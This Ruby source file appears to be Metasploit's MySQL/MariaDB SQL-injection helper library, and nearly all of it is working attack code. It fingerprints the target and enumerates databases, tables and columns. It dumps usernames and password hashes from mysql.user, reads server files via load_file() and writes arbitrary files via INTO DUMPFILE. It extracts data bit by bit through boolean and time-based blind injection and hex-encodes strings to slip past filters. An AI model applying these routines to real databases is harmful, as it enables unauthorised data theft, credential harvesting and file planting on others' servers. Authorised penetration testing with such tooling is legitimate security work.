require 'base64'

#
# This class represents a MySQL/MariaDB injection object. Its primary purpose is to provide the common SQL queries
# needed when performing SQL injection.
# This class should not be instantiated directly; refer to Msf::Exploit::SQLi#create_sqli instead.
#
module Msf::Exploit::SQLi::MySQLi
  class Common < Msf::Exploit::SQLi::Common
    #
    # Encoders supported by MySQL/MariaDB.
    # Each key is the name of an encoder. Each value is a Hash holding:
    #   :encode - an SQL expression in which ^DATA^ marks where the expression to encode is substituted
    #   :decode - a Ruby proc that turns the encoded output back into the raw data
    #
    ENCODERS = {
      base64: {
        # to_base64 output is stripped of the '\n' sequences it contains before being returned
        encode: "replace(to_base64(^DATA^), '\\n', '')",
        decode: proc { |encoded| Base64.decode64(encoded) }
      },
      hex: {
        encode: 'hex(^DATA^)',
        decode: proc { |encoded| Rex::Text.hex_to_raw(encoded) }
      }
    }.freeze

    #
    #   See SQLi::Common#initialize
    #
    #   When opts[:encoder] is a String or a Symbol, it is lowercased and converted to a Symbol, then
    #   replaced by the matching predefined entry of ENCODERS if there is one. The opts Hash is
    #   updated in place before being forwarded to the parent initializer.
    #
    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
      case opts[:encoder]
      when String, Symbol
        encoder_name = opts[:encoder].downcase.to_sym
        # unknown names are left as a Symbol
        opts[:encoder] = ENCODERS.fetch(encoder_name, encoder_name)
      end
      super
    end

    #
    #   Query the MySQL/MariaDB version, by evaluating version() on the target
    #   @return [String] The MySQL/MariaDB version in use
    #
    def version
      sql_function = 'version()'
      call_function(sql_function)
    end

    #
    #   Query the current database name, by evaluating database() on the target
    #   @return [String] The name of the current database
    #
    def current_database
      sql_function = 'database()'
      call_function(sql_function)
    end

    #
    #   Query the current user, by evaluating user() on the target
    #   @return [String] The username of the current user
    #
    def current_user
      sql_function = 'user()'
      call_function(sql_function)
    end

    #
    #   Query the names of all the existing databases, read from information_schema.schemata
    #   @return [Array] An array of Strings, the database names
    #
    def enum_database_names
      rows = dump_table_fields('information_schema.schemata', ['schema_name'])
      # every row holds a single column, so the rows are collapsed into a flat list of names
      rows.flatten
    end

    #
    #   Query the character encoding of the given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [String] The character encoding of the chosen database
    #
    def enum_database_encoding(database = 'database()')
      # a value containing '(' is treated as a function call and left unquoted, anything else is quoted
      schema = database.include?('(') ? database : "'#{database}'"
      rows = dump_table_fields('information_schema.schemata', ['DEFAULT_CHARACTER_SET_NAME'],
                               "SCHEMA_NAME=#{schema}")
      rows.flatten.first
    end

    #
    #   Query the names of the tables in a given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [Array] An array of Strings, the table names in the given database
    #
    def enum_table_names(database = 'database()')
      # a value containing '(' is treated as a function call and left unquoted, anything else is quoted
      schema = database.include?('(') ? database : "'#{database}'"
      rows = dump_table_fields('information_schema.tables', ['table_name'], "table_schema=#{schema}")
      rows.flatten
    end

    #
    #   Query the names of the views in a given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [Array] An array of Strings, the view names in the given database
    #
    def enum_view_names(database = 'database()')
      # a value containing '(' is treated as a function call and left unquoted, anything else is quoted
      schema = database.include?('(') ? database : "'#{database}'"
      rows = dump_table_fields('information_schema.views', ['table_name'], "table_schema=#{schema}")
      rows.flatten
    end

    #
    # Query the MySQL/MariaDB users (their username and password) from the mysql.user table,
    # this might require elevated privileges.
    # NOTE(review): some MySQL releases reportedly keep the hash in an authentication_string column
    # instead of Password - confirm against the targeted server version.
    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and password
    #
    def enum_dbms_users
      credential_columns = ['User', 'Password']
      dump_table_fields('mysql.user', credential_columns)
    end

    #
    #   Query the column names of the given table, optionally restricted to a given database
    #   @param table_name [String] the name of the table of which you want to query the column names,
    #     either a bare table name or database.table
    #   @return [Array] An array of Strings, the column names in the given table belonging to the given database
    #
    def enum_table_columns(table_name)
      filters = []
      if table_name.include?('.')
        # only the first two dot-separated parts are used: the database, then the table
        database, table_name = table_name.split('.')
        # a database containing '(' is treated as a function call and left unquoted
        schema = database.include?('(') ? database : "'#{database}'"
        filters << "table_schema=#{schema}"
      end
      filters.unshift("table_name='#{table_name}'")
      dump_table_fields('information_schema.columns', ['column_name'], filters.join(' and ')).flatten
    end

    #
    #  Query the given columns of the records of the given table, that satisfy an optional condition
    #  @param table [String]  The name of the table to query
    #  @param columns [Array] The names of the columns to query
    #  @param condition [String] An optional condition, return only the rows satisfying it
    #  @param num_limit [Integer] An optional maximum number of results to return, 0 (or less) means no limit
    #  @return [Array] An array, where each element is an array of strings representing a row of the results,
    #    empty when no columns are given
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
      # always hand back an Array, so that callers can chain Array methods such as #flatten
      return [] if columns.empty?

      # NULL values are replaced by @null_replacement, then the column is wrapped in the encoder if any.
      # The block form of String#sub is used so that backslashes in the substituted SQL are kept as-is
      # instead of being interpreted as back-references.
      prepare_column = lambda do |column|
        expression = "ifnull(#{column},'#{@null_replacement}')"
        @encoder ? @encoder[:encode].sub(/\^DATA\^/) { expression } : expression
      end
      if columns.length == 1
        columns = prepare_column.call(columns.first)
      else
        # several columns are merged into one value, separated by @second_concat_separator
        prepared = columns.map { |column| prepare_column.call(column) }
        columns = "concat_ws('#{@second_concat_separator}',#{prepared.join(',')})"
      end

      condition = " where #{condition}" unless condition.empty?
      num_limit = num_limit.to_i

      if @safe
        # no group_concat, leak one row at a time
        row_count = run_sql("select count(1) from #{table}#{condition}").to_i
        num_limit = row_count if num_limit == 0 || row_count < num_limit
        retrieved_data = num_limit.times.map do |current_row|
          if @truncation_length
            truncated_query("select mid(cast(#{columns} as binary),^OFFSET^,#{@truncation_length}) from " \
                            "#{table}#{condition} limit #{current_row},1")
          else
            run_sql("select cast(#{columns} as binary) from #{table}#{condition} limit #{current_row},1")
          end
        end
      else
        separator_clause = @concat_separator ? " separator '#{@concat_separator}'" : ''
        if num_limit > 0
          # limiting the rows requires a subquery, and therefore aliases for the column and the subquery
          alias1, alias2 = 2.times.map { Rex::Text.rand_text_alpha(rand(2..9)) }
          aggregate = "group_concat(#{alias1}#{separator_clause})"
          source = "(select cast(#{columns} as binary) #{alias1} from #{table}#{condition} limit #{num_limit}) #{alias2}"
        else
          aggregate = "group_concat(cast(#{columns} as binary)#{separator_clause})"
          source = "#{table}#{condition}"
        end
        output = if @truncation_length
                   truncated_query("select mid(#{aggregate},^OFFSET^,#{@truncation_length}) from #{source}")
                 else
                   run_sql("select #{aggregate} from #{source}")
                 end
        # rows come back as one string, joined by @concat_separator (',' when it is not set)
        retrieved_data = output.split(@concat_separator || ',')
      end

      retrieved_data.map do |row|
        fields = row.split(@second_concat_separator)
        @encoder ? fields.map { |field| @encoder[:decode].call(field) } : fields
      end
    end

    #
    # Checks if the target is vulnerable (if the SQL injection is working fine), by selecting a random
    # string literal and verifying that the same string comes back
    # @return [Boolean] Whether the SQL injection check was successful
    #
    def test_vulnerable
      length = rand(2..10)
      # the probe must fit in a single truncated response
      length = [length, @truncation_length].min if @truncation_length
      expected = Rex::Text.rand_text_alphanumeric(length)
      literal = "'#{expected}'"
      literal = @encoder[:encode].sub(/\^DATA\^/, literal) if @encoder
      response = run_sql("select #{literal}")
      return false if response.nil?

      response = @encoder[:decode].call(response) if @encoder
      response == expected
    end

    #
    # Attempt writing data to the file at the given path, using SELECT ... INTO DUMPFILE
    # Both arguments are placed between single quotes in the query as they are, without any escaping
    # @param fpath [String] The path of the file to write to
    # @param data [String] The data to write to the given file
    # @return [void]
    #
    def write_to_file(fpath, data)
      statement = "select '#{data}' into dumpfile '#{fpath}'"
      raw_run_sql(statement)
    end

    #
    # Attempt reading from a file on the filesystem through load_file(), requires having the FILE privilege
    # @param fpath [String] The path of the file to read, placed between single quotes without any escaping
    # @param binary [Boolean] Whether the target file is a binary one or not (not used by this implementation)
    # @return [String] The content of the file if reading was successful
    #
    def read_from_file(fpath, binary = false)
      loader = "load_file('#{fpath}')"
      call_function(loader)
    end

    private

    #
    #  Helper method used in cases where the response is truncated: the query is run repeatedly, moving the
    #  offset forward by @truncation_length each time, until a chunk shorter than @truncation_length comes back.
    #  @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
    #  @return [String] The query result, all the retrieved chunks joined together
    #
    def truncated_query(query)
      chunks = []
      position = 1 # offsets start at 1
      loop do
        chunk = run_sql(query.sub('^OFFSET^', position.to_s))
        position += @truncation_length
        chunks.push(chunk)
        vprint_status "{SQLi} Truncated output: #{chunk} of size #{chunk.size}"
        if chunk.length > @truncation_length
          print_warning "The block returned a string larger than the truncation size : #{chunk}"
        end
        # a full-sized chunk means there may be more data to fetch
        break unless chunk.length >= @truncation_length
      end
      chunks.join
    end

    #
    # Checks the options specific to MySQL/MariaDB, then hands over to the parent checks
    # An encoder is accepted when it is nil, a Hash, or a String/Symbol naming one of ENCODERS (case-insensitive)
    # @param opts [Hash] the options to validate, only opts[:encoder] is examined here
    # @raise [ArgumentError] if opts[:encoder] is anything else
    #
    def check_opts(opts)
      encoder = opts[:encoder]
      # respond_to? guards against values such as Integers, which should be rejected with an
      # ArgumentError rather than fail with a NoMethodError on #downcase
      supported = encoder.nil? || encoder.is_a?(Hash) ||
                  (encoder.respond_to?(:downcase) && ENCODERS.key?(encoder.downcase.to_sym))
      raise ArgumentError, 'Unsupported encoder' unless supported

      super
    end

    #
    # Returns the output of a MySQL function call
    # The call is wrapped in the encoder's SQL expression when an encoder is set, and the output is decoded
    # accordingly. When @truncation_length is set, the output is retrieved in chunks with truncated_query.
    # @param function [String] The function call, function_name(arguments...)
    # @return [String] What the function call returns
    #
    def call_function(function)
      # block form of String#sub: with a replacement String, backslash sequences in the function call
      # (for example in a file path) would be interpreted as back-references and corrupt the query
      function = @encoder[:encode].sub(/\^DATA\^/) { function } if @encoder
      output = if @truncation_length
                 truncated_query("select mid(#{function},^OFFSET^,#{@truncation_length})")
               else
                 run_sql("select #{function}")
               end
      @encoder ? @encoder[:decode].call(output) : output
    end

    #
    # Returns the length of the data that query should return, this is used in blind SQL injections
    # The length is recovered one bit at a time, starting from the lowest bit, and the search stops once
    # the length divided by the next power of two is reported to be 0.
    # @param query [String] The SQL query to execute
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [Integer] The length of the data that query should return
    #
    def blind_detect_length(query, timebased)
      # time-based requests wrap each condition in if(<condition>,sleep(<SqliDelay>),0)
      prefix = timebased ? 'if(' : ''
      suffix = timebased ? ",sleep(#{datastore['SqliDelay']}),0)" : ''
      detected = 0
      bit_index = 0
      loop do
        mask = 1 << bit_index
        # the request asks whether the bit is clear, so a negative answer means the bit is set
        bit_clear = blind_request("#{prefix}length(cast((#{query}) as binary))&#{mask}=0#{suffix}")
        detected |= mask unless bit_clear
        bit_index += 1
        break if blind_request("#{prefix}floor(length(cast((#{query}) as binary))/#{1 << bit_index})=0#{suffix}")
      end
      detected
    end

    #
    # Retrieves the output of the given SQL query, this method is used in Blind SQL injections
    # Every byte of the output is rebuilt bit by bit, starting from known_bits.
    # @param query [String] The SQL query the user wants to execute
    # @param length [Integer] The expected length of the output of the result of the SQL query
    # @param known_bits [Integer] a bitmask all the bytes in the output are expected to match
    # @param bits_to_guess [Integer] the number of bits that must be retrieved from each byte of the query output
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [String] The query result
    #
    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
      # time-based requests wrap each condition in if(<condition>,sleep(<SqliDelay>),0)
      prefix = timebased ? 'if(' : ''
      suffix = timebased ? ",sleep(#{datastore['SqliDelay']}),0)" : ''
      characters = (1..length).map do |position|
        byte = (0...bits_to_guess).reduce(known_bits) do |value, bit|
          mask = 1 << bit
          # mid() picks the byte at the given position, ascii() gives its value, and the request asks
          # whether the masked bit is clear: a negative answer means the bit is set
          bit_clear = blind_request("#{prefix}ascii(mid(cast((#{query}) as binary), #{position}, 1))&#{mask}=0#{suffix}")
          bit_clear ? value : value | mask
        end
        byte.chr
      end
      characters.join
    end

    #
    # Encodes strings in the query string as hexadecimal numbers
    # Empty string literals ('' or "") are replaced by a repeat(0x..,0) call on a random byte, and
    # non-empty quoted literals by a 0x hex sequence of their content.
    # @param query [String] an SQL query
    # @return [String] The input query, where strings are replaced by hex sequences
    #
    def hex_encode_strings(query)
      # for more encoding capabilities, run code at the beginning of your block
      without_empty_literals = query.gsub(/''|""/) { "repeat(0x#{rand(0..255).to_s(16)},0)" }
      without_empty_literals.gsub(/'[^']+?'|"[^"]+?"/) do |literal|
        # drop the surrounding quotes before hex-encoding the content
        "0x#{Rex::Text.to_hex(literal[1..-2], '')}"
      end
    end
  end
end
